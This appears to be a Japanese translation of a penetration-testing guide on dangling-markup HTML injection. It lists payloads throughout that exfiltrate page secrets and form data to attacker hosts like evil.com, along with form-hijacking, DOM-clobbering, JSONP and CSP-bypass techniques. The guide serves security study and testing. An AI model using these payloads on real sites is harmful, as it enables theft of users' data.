要約

このテクニックは、HTMLインジェクションが見つかったときにユーザーから情報を抽出するために使用できます。これは、XSSを悪用する方法が見つからない場合に非常に役立ちますが、いくつかのHTMLタグをインジェクトできる場合です。 また、秘密が平文で保存されている場合にクライアントからそれを外部に送信したい場合や、スクリプトの実行を誤誘導したい場合にも役立ちます。

ここでコメントされているいくつかのテクニックは、予期しない方法で情報を外部に送信することによっていくつかのContent Security Policyをバイパスするために使用できます（htmlタグ、CSS、http-metaタグ、フォーム、baseなど）。

主な応用

平文の秘密を盗む

ページが読み込まれるときに<img src='http://evil.com/log.cgi?をインジェクトすると、被害者はインジェクトされたimgタグとコード内の次の引用符の間のすべてのコードを送信します。そのチャンクに秘密がある場合、それを盗みます（同じことを二重引用符を使用して行うこともできます。より興味深いものを使用するかどうかを確認してください）。

imgタグが禁止されている場合（たとえばCSPのため）、<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?を使用することもできます。

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

注意してください。Chromeは、"<"や"\n"を含むHTTP URLをブロックしますので、"ftp"など他のプロトコルスキームを試すことができます。

CSSの@importを悪用することもできます（";"が見つかるまでコード全体を送信します）。

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

あなたは**<table**を使用することもできます:

<table background='//your-collaborator-id.burpcollaborator.net?'

以下は、<baseタグを挿入することもできます。引用符が閉じられるまで、すべての情報が送信されますが、ユーザーの操作が必要です（ユーザーはリンクをクリックする必要があります。なぜなら、baseタグがリンクが指すドメインを変更しているためです）:

<base target='        <--- Injected
steal me'<b>test</b>

フォームの盗み取り

<base href='http://evil.com/'>

フォームの盗み取り 2

フォームヘッダーを設定します：<form action='http://evil.com/log_steal'> これにより、次のフォームヘッダーが上書きされ、フォームのすべてのデータが攻撃者に送信されます。

フォームの盗み取り 3

ボタンは、属性 "formaction" を使用して、フォームの情報が送信されるURLを変更できます：

<button name=xss type=submit formaction='https://google.com'>I get consumed!

攻撃者はこれを使用して情報を盗むことができます。

この攻撃の例をこの解説で見つけることができます。

明文の秘密を盗む2

最新のテクニックを使用してフォームを盗む（新しいフォームヘッダーを注入する）ことができ、その後新しい入力フィールドを注入できます：

<input type='hidden' name='review_body' value="

そして、この入力フィールドには、HTML内の二重引用符と次の二重引用符の間のすべてのコンテンツが含まれます。この攻撃は、"Stealing clear text secrets"と"Stealing forms2"を組み合わせています。

同じことを、フォームと<option>タグを注入することで行うことができます。閉じられた</option>が見つかるまでのすべてのデータが送信されます：

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

フォームパラメーターインジェクション

フォームのパスを変更し、新しい値を挿入することで、予期しないアクションが実行される可能性があります:

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

noscriptを通じたクリアテキストの秘密情報の盗み出し

<noscript></noscript>は、ブラウザがJavaScriptをサポートしていない場合にその内容が解釈されるタグです（ChromeでJavaScriptを有効/無効にするには、chrome://settings/content/javascriptにアクセスしてください）。

攻撃者が制御するサイトに、挿入ポイントからWebページの内容を盗み出す方法は、次のように挿入することです：

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

ユーザーインタラクションを使ったCSPのバイパス

このportswiggersの研究から、最もCSPが制限された環境でも、ユーザーインタラクションを使ってまだデータを外部に送信することができることがわかります。今回は、次のペイロードを使用します：

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

注意してください。被害者にリンクをクリックしてもらい、それによってあなたが制御する****ペイロードにリダイレクトされるようにします。また、baseタグ内のtarget属性には、次のシングルクォートまでのHTMLコンテンツが含まれていることにも注意してください。 これにより、リンクがクリックされた場合の**window.nameの値は、そのHTMLコンテンツ全体になります。したがって、被害者がリンクをクリックしてアクセスしているページをあなたが制御しているため、そのwindow.nameにアクセスしてそのデータを外部送信**することができます。

<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

誤解を招くスクリプトワークフロー1 - HTMLネームスペース攻撃

次のものを上書きし、スクリプトのフローに影響を与える値を持つ新しいタグをHTML内に挿入します。この例では、情報を共有する相手を選択しています：

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

誤解を招くスクリプトワークフロー2 - スクリプト名前空間攻撃

HTMLタグを挿入してjavascript名前空間内に変数を作成します。その後、この変数はアプリケーションのフローに影響を与えます。

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

JSONPの悪用

JSONPインターフェースを見つけた場合、任意のデータを使用して任意の関数を呼び出すことができるかもしれません：

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

または、JavaScript を実行しようとすることさえできます：

<script src='/search?q=a&call=alert(1)'></script>

Iframeの悪用

子ドキュメントは、親のlocationプロパティをクロスオリジンの状況でも表示および変更する機能を持っています。これにより、iframe内にスクリプトを埋め込み、クライアントを任意のページにリダイレクトすることが可能です。

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

これは次のように緩和することができます： sandbox=' allow-scripts allow-top-navigation'

また、別のページから機密情報を漏洩させるためにiframeを悪用することもできます iframeのname属性を使用。これは、機密情報がiframeのname属性内に表示されるHTMLインジェクションを悪用して、自分自身をiframesするiframeを作成できるため、初期のiframeからその名前にアクセスして漏洩させることができるためです。

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

For more info check https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<metaの悪用

**meta http-equiv**を使用してCookieを設定するなど、複数のアクションを実行できます：<meta http-equiv="Set-Cookie" Content="SESSID=1">またはリダイレクトを実行する（この場合は5秒後に）：<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

これはhttp-equivに関するCSPで回避できます（Content-Security-Policy: default-src 'self';、またはContent-Security-Policy: http-equiv 'self';）

新しい<portal HTMLタグ

<portalタグの脆弱性に関する非常に興味深い研究がこちらで見つけられます。 この執筆時点では、Chromeでchrome://flags/#enable-portalsでportalタグを有効にする必要があります。それ以外の場合は機能しません。

<portal src='https://attacker-server?

HTMLリーク

HTMLで接続情報を漏洩させる方法のすべてがDangling Markupに役立つわけではありませんが、時には役立つこともあります。こちらで確認できます：https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SSリーク

これはdangling markupとXS-Leaksのミックスです。脆弱性の一方では、攻撃対象となるページと同じオリジンのページにHTMLを注入することができますが、もう一方では、HTMLを注入できるページを直接攻撃するのではなく、別のページを攻撃します。

XS-Search/XS-Leaks

XS-Searchはサイドチャネル攻撃を悪用してクロスオリジン情報を外部に送信することを目的としています。したがって、これはDangling Markupとは異なる技術ですが、一部の技術はHTMLタグの含有を悪用します（JSの実行あり・なし）、例えばCSS InjectionやLazy Load Imagesなど。

ブルートフォース検出リスト

Auto_Wordlists/dangling_markup.txt at main · carlospolop/Auto_WordlistsGitHub

参考文献

• https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057

• http://lcamtuf.coredump.cx/postxss/

• http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/

• https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup